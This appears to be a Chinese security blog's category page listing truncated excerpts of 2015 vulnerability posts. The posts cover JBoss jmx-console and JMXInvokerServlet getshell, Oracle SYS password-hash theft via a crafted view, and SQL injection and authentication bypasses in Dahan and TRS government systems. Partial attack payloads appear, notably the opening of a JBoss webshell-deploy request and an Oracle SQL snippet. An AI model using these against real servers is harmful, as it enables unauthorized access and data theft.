分类 JSP 下的文章

用友PDM Professional全版本通用型配置不当导致getshell

主要是JBOSS造成的问题 jboss未授权访问导致getshellhttp://url/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.Strin...

没穿底裤 2015 年 10 月 03 日 暂无评论

Oracle 9i/10g Oracle越权修改SYS密码

exp地址https://www.exploit-db.com/exploits/4203/ 首先用一个低权限账户比如DBSNMP登录Oracle 然后执行SQLcreate or replace view bunkerview as select x.name,x.password from sys.user$ x left outer join sys.user$ y on x.na...

没穿底裤 2015 年 09 月 17 日 暂无评论

大汉政府信息公开多处SQL注入

主要是webservice漏洞,漏洞存在于 1./xxgk/services/WSSync_xxgk?wsdl该WSSync_xxgk服务的多个方法,多个参数存在严重漏洞,且该漏洞普遍存在。 wsGetWeb getClientIpAxis wsGetColumn wsGetColumnStyle wsSynchronize wsSynchronizeWithPath wsSync 上述方法...

没穿底裤 2015 年 07 月 24 日 暂无评论

大汉网络0day通杀所有系统和版本

管理后台权限绕过,进入后台后轻松GetShell, 经验证通杀所有系统和版本,包括:jcms,jact,jsearch,vipchat,vc,xxgk等等。Setup目录Session权限绕过:代码分析 /jcms/setup/opr_licenceinfo.jsp : //获取Session中cookie_username的值,赋值给strUser String str...

没穿底裤 2015 年 07 月 24 日 暂无评论

拓尔思某系统越权操作大集合及GETSHELL

/* *说明: *Copyright ©2004 - 2006 TRS 不受影响 *Copyright ©2004 - 2008 TRS 不受影响 *以及部分二次开发的不受影响 *-------------------------------------- *越权可查看用户信息,几个案例用户加加都有上百万了~ */程序名称:TRS身份服务器单点登录系统 漏洞类型:越权操作 &...

没穿底裤 2015 年 04 月 18 日 暂无评论

JBoss JMXInvokerServlet Remote Command Execution

/* * JBoss JMXInvokerServlet Remote Command Execution * JMXInvoker.java v0.3 - Luca Carettoni @_ikki * * This code exploits a common misconfiguration in JBoss Application Server (4.x, 5.x, ...)...

没穿底裤 2015 年 04 月 01 日 暂无评论